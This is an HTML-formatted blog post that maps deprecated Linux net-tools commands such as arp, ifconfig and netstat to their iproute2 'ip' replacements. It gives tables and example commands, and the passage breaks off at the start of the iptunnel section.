&lt;span style="font-family: 'Lucida Sans Unicode', sans-serif;"&gt;Okay so first of all, a very&amp;nbsp;&lt;b&gt;Happy New year&lt;/b&gt;&amp;nbsp;to all the readers, followers, subscribers, and any one directly or indirectly related to the website. I had been writing this post from last two days, and got time to publish on this warm occasion of New Year. Neways, lets start up.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-attachment: scroll; background-clip: initial; background-color: white; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; margin-bottom: 0.0001pt;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-attachment: scroll; background-clip: initial; background-color: white; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; margin-bottom: 0.0001pt;"&gt;
&lt;span style="font-family: 'Lucida Sans Unicode', sans-serif;"&gt;From so long we have been using many of the Linux commands, which can however can be replaced with some optional commands, which sounds damn easy and small as compared to old ones. Specifically, the commands which can be ignored while using &amp;nbsp;Linux networking are:&amp;nbsp;&lt;b&gt;arp&lt;/b&gt;,&amp;nbsp;&lt;b&gt;ifconfig&lt;/b&gt;,&amp;nbsp;&lt;b&gt;iptunnel&lt;/b&gt;,&amp;nbsp;&lt;b&gt;iwconfig&lt;/b&gt;,&lt;b&gt;nameif&lt;/b&gt;,&amp;nbsp;&lt;b&gt;netstat&lt;/b&gt;, and&amp;nbsp;&lt;b&gt;route&lt;/b&gt;. These programs (except&amp;nbsp;&lt;b&gt;iwconfig&lt;/b&gt;) are included in the&amp;nbsp;net-tools&amp;nbsp;package that has been unmaintained for years. The functionality provided by several of these utilities has been reproduced and improved in the new&amp;nbsp;iproute2&amp;nbsp;suite, primarily by using its new&amp;nbsp;&lt;b&gt;ip&lt;/b&gt;&amp;nbsp;command. The&amp;nbsp;&lt;b&gt;iproute2&lt;/b&gt;&amp;nbsp;software code and documentation are available from the&amp;nbsp;Linux Foundation.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Lucida Sans Unicode', sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; margin-bottom: 0in;"&gt;
&lt;span style="font-family: 'Lucida Sans Unicode', sans-serif;"&gt;Now let’s take a closer look at these commands and their replacements.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; margin-bottom: 0in;"&gt;
&lt;span style="font-family: 'Lucida Sans Unicode', sans-serif;"&gt;This article will not focus on&amp;nbsp;&lt;b&gt;iproute2&lt;/b&gt;&amp;nbsp;or the&amp;nbsp;&lt;b&gt;ip&lt;/b&gt;&amp;nbsp;command in detail; instead it will simply give one-to-one mappings between the deprecated commands and their new counterparts. For replacement commands that are listed as ‘not apparent’, please&amp;nbsp;contact me&amp;nbsp;if you know otherwise.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: 'Lucida Sans Unicode', sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="background-attachment: scroll; background-clip: initial; background-color: white; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; margin-bottom: 0.0001pt;"&gt;
&lt;br /&gt;
&lt;table border="1" style="width: 680px;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Deprecated command&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Replacement command(s)&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip n&lt;/strong&gt; (&lt;strong&gt;ip neighbor)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip a&lt;/strong&gt; (&lt;strong&gt;ip addr&lt;/strong&gt;), &lt;strong&gt;ip link&lt;/strong&gt;, &lt;strong&gt;ip -s&lt;/strong&gt; (&lt;strong&gt;ip -stats)&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iptunnel&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;&lt;strong&gt;ip tunnel&lt;/strong&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iwconfig&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;&lt;strong&gt;iw&lt;/strong&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;nameif&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link&lt;/strong&gt;, &lt;strong&gt;ifrename&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;netstat&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ss&lt;/strong&gt;, &lt;strong&gt;ip route &lt;/strong&gt;(for &lt;strong&gt;netstat-r&lt;/strong&gt;), &lt;strong&gt;ip -s link &lt;/strong&gt;(for &lt;strong&gt;netstat -i&lt;/strong&gt;), &lt;strong&gt;ip maddr &lt;/strong&gt;(for &lt;strong&gt;netstat-g&lt;/strong&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;route&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip r&lt;/strong&gt; (&lt;strong&gt;ip route&lt;/strong&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;br /&gt;
.&lt;br /&gt;
Now let’s take a closer look at these deprecated commands and their replacements.&lt;br /&gt;
&lt;span id="more-554"&gt;&lt;/span&gt;&lt;br /&gt;
This article will not focus on &lt;strong&gt;iproute2&lt;/strong&gt; or the &lt;strong&gt;ip&lt;/strong&gt;
 command in detail; instead it will simply give one-to-one mappings 
between the deprecated commands and their new counterparts. For 
replacement commands that are listed as ‘not apparent’, please contact me if you know otherwise.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a href="http://draft.blogger.com/blogger.g?blogID=5015567148035666316" name="arp"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h2&gt;

Arp&lt;/h2&gt;
&lt;table border="1" style="width: 680px;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Deprecated arp commands&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Replacement&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -a [host] &lt;/strong&gt;or&lt;strong&gt; –all [host]&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Shows the entries of the specified host name or IP address. If the &lt;strong&gt;[host]&lt;/strong&gt; parameter is not used, all entries will be displayed.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip n&lt;/strong&gt; (or &lt;strong&gt;ip neighbor&lt;/strong&gt;), or&lt;strong&gt; ip n show&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -d [ip_addr]&lt;/strong&gt; or &lt;strong&gt;–delete [ip_addr]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Removes the ARP cache entry for the specified host.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip n del [ip_addr] &lt;/strong&gt;(this “invalidates” neighbor entries)&lt;strong&gt;&lt;br /&gt;
.&lt;br /&gt;
ip n f [ip_addr]&lt;/strong&gt; (or &lt;strong&gt;ip n flush [ip_addr]&lt;/strong&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -D &lt;/strong&gt;or&lt;strong&gt; –use-device&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Uses the hardware address associated with the specified interface.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -e&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Shows the entries in default (Linux) style.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -f [filename] &lt;/strong&gt;or&lt;strong&gt; –file [filename]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Similar to the &lt;strong&gt;-s&lt;/strong&gt; option, only this time the address info is taken from the file that &lt;strong&gt;[filename]&lt;/strong&gt; set up. If no &lt;strong&gt;[filename]&lt;/strong&gt; is specified, &lt;em&gt;/etc/ethers&lt;/em&gt; is used as default.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -H &lt;/strong&gt;or&lt;strong&gt; –hw-type [type] &lt;/strong&gt;or&lt;strong&gt; -t [type]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
When setting or reading the ARP cache, this optional parameter tells &lt;strong&gt;arp&lt;/strong&gt; which class of entries it should check for. The default value of this parameter is &lt;strong&gt;ether&lt;/strong&gt; (i.e. hardware code 0×01 for IEEE 802.3 10Mbps Ethernet).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -i [int] &lt;/strong&gt;or&lt;strong&gt; &lt;strong&gt;–device [int]&lt;/strong&gt;&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Selects an interface. When dumping the ARP cache only entries matching the specified interface will be printed. For example, &lt;strong&gt;arp -i eth0 -s 10.21.31.41 A321.ABCF.321A&lt;/strong&gt; creates a static ARP entry associating IP address 10.21.31.41 with MAC address A321.ABCF.321A on &lt;strong&gt;eth0&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip n [add | chg | del | repl] dev [name]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -n &lt;/strong&gt;or&lt;strong&gt; –numeric&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Shows IP addresses instead of trying to determine domain names.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -s [ip_addr] [hw_addr] &lt;/strong&gt;or&lt;strong&gt; –set [ip_addr]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Manually creates a static ARP address mapping entry for host &lt;strong&gt;[ip_addr]&lt;/strong&gt; with the hardware address set to &lt;strong&gt;[hw_addr]&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip n add [ip_addr] lladdr [mac_address] dev [device] nud [nud_state] &lt;/strong&gt;(see example below)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;arp -v&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Uses verbose mode to provide more details.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip -s n&lt;/strong&gt; (or &lt;strong&gt;ip -stats n&lt;/strong&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
.&lt;br /&gt;
Some &lt;strong&gt;ip neighbor&lt;/strong&gt; examples are as follows:&lt;br /&gt;
&lt;strong&gt;# ip n del 10.1.2.3 dev eth0&lt;/strong&gt;&lt;br /&gt;
Invalidates the ARP cache entry for host 10.1.2.3 on device &lt;strong&gt;eth0&lt;/strong&gt;.&lt;br /&gt;
&lt;strong&gt;# ip neighbor show dev eth0&lt;/strong&gt;&lt;br /&gt;
Shows the ARP cache for interface &lt;strong&gt;eth0&lt;/strong&gt;.&lt;br /&gt;
&lt;strong&gt;# ip n add 10.1.2.3 lladdr 1:2:3:4:5:6 dev eth0 nud perm&lt;/strong&gt;&lt;br /&gt;
Adds a “permanent” ARP cache entry for host 10.1.2.3 device &lt;strong&gt;eth0&lt;/strong&gt;. The Neighbor Unreachability Detection (&lt;strong&gt;nud&lt;/strong&gt;) state can be one of the following:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;noarp&lt;/strong&gt; – entry is valid. No attempts to validate this entry will be made but it can be removed when its lifetime expires.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;permanent&lt;/strong&gt; – entry is valid forever and can be only be removed administratively.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;reachable&lt;/strong&gt; – entry is valid until the reachability timeout expires.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;stale&lt;/strong&gt; – entry is valid but suspicious.&lt;/li&gt;
&lt;/ul&gt;
&lt;a href="http://draft.blogger.com/blogger.g?blogID=5015567148035666316" name="ifconfig"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h2&gt;

Ifconfig&lt;/h2&gt;
&lt;table border="1" style="width: 680px;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Deprecated ifconfig commands&lt;br /&gt;
&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Replacement&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Displays details on all network interfaces.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip a&lt;/strong&gt; (or &lt;strong&gt;ip addr&lt;/strong&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
The name of the interface. This is usually a driver name followed by a unit number; for example, &lt;strong&gt;eth0&lt;/strong&gt; for the first Ethernet interface. &lt;strong&gt;Eth0&lt;/strong&gt; will usually be a PC’s primary network interface card (NIC).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip a show dev [interface]&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [address_family]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
To enable the interpretation of differing naming schemes used by various protocols, &lt;strong&gt;[address_family]&lt;/strong&gt; is used for decoding and displaying all protocol addresses. Currently supported address families include &lt;strong&gt;inet&lt;/strong&gt; (TCP/IP, default), &lt;strong&gt;inet6&lt;/strong&gt; (IPv6), &lt;strong&gt;ax25&lt;/strong&gt; (AMPR Packet Radio), &lt;strong&gt;ddp&lt;/strong&gt; (Appletalk Phase 2), &lt;strong&gt;ipx&lt;/strong&gt; (Novell IPX) and &lt;strong&gt;netrom&lt;/strong&gt; (AMPR Packet radio).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip -f [family] a&lt;/strong&gt;&lt;strong&gt;&lt;br /&gt;
.&lt;br /&gt;
[family]&lt;/strong&gt; can be &lt;strong&gt;inet&lt;/strong&gt; (IPv4), &lt;strong&gt;inet6&lt;/strong&gt; (IPv6), or &lt;strong&gt;link&lt;/strong&gt;. Additionally, &lt;strong&gt;-4&lt;/strong&gt; = &lt;strong&gt;-f inet&lt;/strong&gt; and&lt;strong&gt; -6&lt;/strong&gt; = &lt;strong&gt;-f inet6&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig &lt;strong&gt;[interface]&lt;/strong&gt; add [address/prefixlength&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Adds an IPv6 address to the &lt;strong&gt;[interface]&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip a add [ip_addr/mask] dev [interface]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] address [address]&lt;br /&gt;
.&lt;br /&gt;
&lt;/strong&gt;Assigns the specified IP &lt;strong&gt;[address]&lt;/strong&gt; to the specified &lt;strong&gt;[interface].&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip a add [ip_addr/mask] dev [interface]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] allmulti &lt;/strong&gt;or&lt;strong&gt; -allmulti&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Enables or disables all-multicast mode. If selected, all multicast packets on the network will be received by the &lt;strong&gt;[interface]&lt;/strong&gt; specified. This enables or disables the sending of incoming frames to the kernel’s network layer.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip mr iif [name]&lt;/strong&gt; or &lt;strong&gt;ip mroute iif [name]&lt;/strong&gt;, where &lt;strong&gt;[name]&lt;/strong&gt; is the interface on which multicast packets are received.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] arp&lt;/strong&gt; or &lt;strong&gt;-arp&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Enables or disables the use of the ARP protocol on this &lt;strong&gt;[interface]&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link set arp on&lt;/strong&gt; or &lt;strong&gt;arp off&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] broadcast [address]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Specifies the address to use to use for broadcast transmissions. By 
default, the broadcast address for a subnet is the IP address with all 
ones in the host portion of the subnet address (i.e., &lt;em&gt;a.b.c.255&lt;/em&gt; for a /24 subnet).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip a add broadcast [ip_address]&lt;br /&gt;
&lt;/strong&gt;&lt;strong&gt;.&lt;br /&gt;
ip link set dev [interface] broadcast [mac_address]&lt;/strong&gt; (sets the link layer broadcast address)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] del [address/prefixlength]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Removes an IPv6 address from the &lt;strong&gt;[interface]&lt;/strong&gt;, such as &lt;strong&gt;eth0&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip a del [ipv6_addr&lt;/strong&gt; or &lt;strong&gt;ipv4_addr] dev [interface]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] down&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Disables the &lt;strong&gt;[interface]&lt;/strong&gt;, such as &lt;strong&gt;eth0&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link set dev [interface] down&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] hw [class] [address]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the hardware (MAC) address of this &lt;strong&gt;[interface]&lt;/strong&gt;, if the device driver supports this operation. The keyword &lt;em&gt;must&lt;/em&gt; be followed by the name of the hardware &lt;strong&gt;[class]&lt;/strong&gt; and the printable ASCII equivalent of the hardware address. Hardware classes currently supported include &lt;strong&gt;ether &lt;/strong&gt; (Ethernet), &lt;strong&gt;ax25&lt;/strong&gt; (AMPR AX.25), &lt;strong&gt;ARCnet&lt;/strong&gt; and &lt;strong&gt;netrom&lt;/strong&gt; (AMPR NET/ROM).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link set dev [interface] address [mac_addr]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] io_addr [address]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the start &lt;strong&gt;[address]&lt;/strong&gt; in I/O space for this device.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent; possibly &lt;strong&gt;ethtool&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] irq [address]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the interrupt line used by the network interface.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent; possibly &lt;strong&gt;ethtool&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] mem_start [address]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the start address for shared memory of the interface.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent; possibly &lt;strong&gt;ethtool&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] media [type]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets physical port or medium type. Examples of &lt;strong&gt;[type]&lt;/strong&gt; are &lt;strong&gt;10baseT&lt;/strong&gt;, &lt;strong&gt;10base2&lt;/strong&gt;, and &lt;strong&gt;AUI&lt;/strong&gt;. A &lt;strong&gt;[type]&lt;/strong&gt; value of &lt;strong&gt;auto&lt;/strong&gt; will tell the interface driver to automatically determine the media type (driver support for this command varies).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent; possibly &lt;strong&gt;ethtool&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] mtu [n]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the Maximum Transfer Unit (MTU) of an interface to &lt;strong&gt;[n]&lt;/strong&gt;.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link set dev [interface] mtu [n]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] multicast&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the multicast flag on the interface (should not normally be needed as the drivers set the flag correctly themselves).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link set dev [interface] multicast on&lt;/strong&gt; or &lt;strong&gt;off&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] netmask [mask_address]&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the &lt;em&gt;subnet mask&lt;/em&gt; (not the IP address) for this &lt;strong&gt;[interface]&lt;/strong&gt;.
 This value defaults to the standard Class A, B, or C subnet masks 
(based on the interface IP address) but can be changed with this 
command.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;Not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] pointopoint &lt;/strong&gt;or&lt;strong&gt; -pointopoint&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Enables or disables point-to-point mode on this &lt;strong&gt;&lt;strong&gt;[interface]&lt;/strong&gt;.&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;&lt;/strong&gt;not apparent; possibly&amp;nbsp;&lt;strong&gt;ipppd [device]&lt;/strong&gt;. The command &lt;strong&gt;ip a add peer [address]&lt;/strong&gt; specifies the address of the remote endpoint for point-to-point interfaces.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] promisc &lt;/strong&gt;or&lt;strong&gt; -promisc&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Enables or disables promiscuous mode on the &lt;strong&gt;[interface]&lt;/strong&gt;.&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link set dev [interface] promisc on &lt;/strong&gt;or&lt;strong&gt; off&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] txquelen [n]&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Sets the transmit queue length on the &lt;strong&gt;[interface]&lt;/strong&gt;. Smaller values are recommended for connections with high latency (i.e., dial-up modems, ISDN, etc).&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link set dev [interface] txqueuelen [n]&lt;/strong&gt; or &lt;strong&gt;txqlen [n]&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] tunnel [address]&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Creates a Simple Internet Transition (IPv6-in-IPv4) device which tunnels to the IPv4 &lt;strong&gt;[address]&lt;/strong&gt; provided.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip tunnel mode sit&lt;/strong&gt; (other possible modes are &lt;strong&gt;ipip&lt;/strong&gt; and &lt;strong&gt;gre)&lt;/strong&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ifconfig [interface] up&lt;/strong&gt;&lt;br /&gt;
.&lt;br /&gt;
Activates (enables) the &lt;strong&gt;[interface]&lt;/strong&gt; specified.&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip link set [interface] up&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
.&lt;br /&gt;
Some examples illustrating the &lt;strong&gt;ip&lt;/strong&gt; command are as follows; using the table above you should be able to figure out what they do.&lt;br /&gt;
&lt;strong&gt;# ip link show dev eth0&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;# &lt;/strong&gt;ip a add 10.11.12.13/8 dev eth0&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;# &lt;/strong&gt;ip link set dev eth0 up&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;# &lt;/strong&gt;ip link set dev eth0 mtu 1500&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;# &lt;/strong&gt;ip link set dev eth0 address 00:70:b7:d6:cd:ef&lt;/strong&gt;&lt;br /&gt;
&lt;a href="http://draft.blogger.com/blogger.g?blogID=5015567148035666316" name="iptunnel"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h2&gt;

Iptunnel&lt;/h2&gt;
&lt;table border="1" style="width: 680px;"&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;&lt;h3&gt;

